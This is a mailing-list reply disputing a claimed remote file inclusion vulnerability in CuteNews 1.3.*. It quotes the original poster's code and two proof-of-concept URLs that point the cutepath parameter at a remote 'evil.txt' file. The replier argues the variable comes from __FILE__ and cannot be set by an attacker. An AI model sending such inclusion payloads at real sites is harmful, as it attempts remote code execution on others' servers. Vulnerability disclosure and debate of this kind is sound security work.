<<< Date Index >>>     <<< Thread Index >>>

Re: CuteNews 1.3.* Remote File Include Vulnerability



stormhacker@xxxxxxxxxxx wrote:


-----------------Description---------------


$cutepath =  __FILE__;

$cutepath = preg_replace( "'\\\search\.php'", "", $cutepath);

$cutepath = preg_replace( "'/search\.php'", "", $cutepath);


require_once("$cutepath/inc/functions.inc.php");


--------------PoC/Exploit----------------------


show_news.php?cutepath=http://host/evil.txt?

search.php?cutepath=http://host/evil.txt?


$cutepath =  __FILE__;

$cutepath is set to script's working directory, so you can not set it manually.

--------------Solution---------------------


No Patch available.


As no needed? ;)


Greets,
satalin